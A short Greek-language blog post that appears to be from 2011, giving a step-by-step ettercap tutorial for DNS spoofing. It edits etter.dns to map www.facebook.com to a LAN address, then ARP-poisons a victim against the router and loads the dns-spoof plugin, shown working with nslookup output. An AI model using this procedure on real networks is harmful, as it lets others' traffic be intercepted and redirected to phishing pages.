RSS

DNS Spoofing

06 Dec

Ένας απλός τρόπος για redirection χωρίς να ανακατευτούμε καθόλου με το hosts file είναι με DNS Spoofing .

Η εφαρμογή ettercap μέσω ενός pluggun (dns-spoof) μας δίνει αυτή τη δυνατότητα.

Εμείς το μόνο που έχουμε να κάνουμε είναι να “πειράξουμε” το etter.dns που βρίσκετε στον υπολογιστή μας.
[root@megatron pr0n]# nano /usr/share/ettercap/etter.dns

############################################################################
#                                                                          #
#  ettercap -- etter.dns -- host file for phantom plugin                   #
#                                                                          #
#  Copyright (C) 2001  ALoR <alor@users.sourceforge.net>                   #
#                      NaGA <crwm@freemail.it>                             #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
#                                                                          #
# Sample hosts file for phantom plugin                                     #
#                                                                          #
# the format is :                                                          #
#                                                                          #
#  xxx.xxx.xxx.xxx<TAB>www.myhostname.com                                  #
#                                                                          #
# NOTE: the wildcarded hosts can't be used to poison the PTR requests      #
#       so if you want to reverse poison you have to specify a plain       #
#       host. (look at the microsoft example)                              #
#                                                                          #
############################################################################
################################
# microsoft sucks;)
# redirect it to www.linux.org
#
www.facebook.com A 192.168.0.135

Στη συνέχεια ανοίγουμε το ettercap (την GTK έκδοση)
[root@megatron pr0n]# ettercap -G

  • Καταρχάς ορίζουμε το network interface Snif –> Unified Sniffing
  • Μετά πάμε, Hosts –> Scan for hosts για να δούμε όλους του συνδεδεμένους στο δίκτυο Η/Υ.
  • Επιλέγουμε το στόχο μας: Hosts –> Host list και ορίζουμε σαν target 1 τον router και το στόχο μας σαν target 2.
  • Στη συνέχεια –απ’ το menu– πάμε στο Mitm –> Arp Poisoning και πατάμε ΟΚ.
  • Όταν γίνει αυτό, φορτώνουμε το pluggin dns-spoof (πάλι απ’ το menu) Plugins –> Manage plugins και επιλέγουμε το dns-spoof.
  • Tέλος, Start –> Start sniffing.

Όταν γίνει αυτό δοκίμαζουμε να δώσειςαπ’ τον στόχο μας στο (command prompt) nslookup http://www.facebook.com

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\pr0n>nslookup www.facebook.com
Server:  Smootwall
Address:  192.168.***.***
Name:    www.facebook.com
Address:  192.168.0.135
C:\Documents and Settings\pr0n>
 
Leave a comment

Posted by on December 6, 2011 in It's Greek to Me

 

Tags: ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: